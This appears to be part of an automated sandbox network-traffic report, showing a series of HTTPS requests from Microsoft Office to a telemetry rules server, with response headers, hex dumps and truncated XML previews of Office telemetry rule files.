                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                              ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                              x-ms-request-id: 7b3b97af-701e-003e-795c-3d79b3000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124006Z-178bfbc474bwh9gmhC1NYCy3rs0000000600000000008h5q
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:06 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              134192.168.2.64990313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:07 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:07 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1399
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                              x-ms-request-id: 734d7ed2-001e-002b-08e4-3c99f2000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124007Z-178bfbc474bv587zhC1NYCny5w00000005xg000000002tyg
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:08 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              135192.168.2.64990413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:07 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:07 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1362
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                              ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                              x-ms-request-id: 1a99a412-f01e-0099-613c-3c9171000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124007Z-174c587ffdf9xbcchC1TEBxkz4000000049g000000009nb9
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:08 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              136192.168.2.64990513.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:07 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:07 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                              ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                              x-ms-request-id: d029e12f-101e-00a2-1e39-3c9f2e000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124007Z-178bfbc474bq2pr7hC1NYCkfgg000000067g000000000a0d
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:08 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              137192.168.2.64990713.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:08 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:08 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1399
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE976026E"
                                                                                                                                                                                              x-ms-request-id: 0cceccde-a01e-006f-2615-3d13cd000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124008Z-178bfbc474bq2pr7hC1NYCkfgg000000062g000000007z9p
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:08 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              138192.168.2.64990613.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:08 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:08 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                              x-ms-request-id: 852b0afa-d01e-00a1-0e9b-3b35b1000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124008Z-174c587ffdfb74xqhC1TEBhabc00000004bg00000000g5nu
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:08 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              139192.168.2.64990913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:09 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:10 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1425
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                              x-ms-request-id: fbe5d26c-f01e-0003-6a17-3e4453000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124010Z-15b8b599d8885prmhC1TEBsnkw00000004p0000000001wna
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:10 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              140192.168.2.64991013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:09 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:10 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1388
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                              x-ms-request-id: ab1afa94-201e-0085-151a-3d34e3000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124010Z-178bfbc474btvfdfhC1NYCa2en000000061000000000786z
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:10 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              141192.168.2.64990813.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:09 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:10 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1362
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                              x-ms-request-id: 5b744128-c01e-00a1-5b39-3d7e4a000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124010Z-15b8b599d889fz52hC1TEB59as00000004dg000000008gy4
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:10 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              142192.168.2.64991113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:10 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:10 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1415
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                              x-ms-request-id: 5431248a-601e-005c-155d-3df06f000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124010Z-174c587ffdftjz9shC1TEBsh9800000004cg000000001qyk
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:10 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
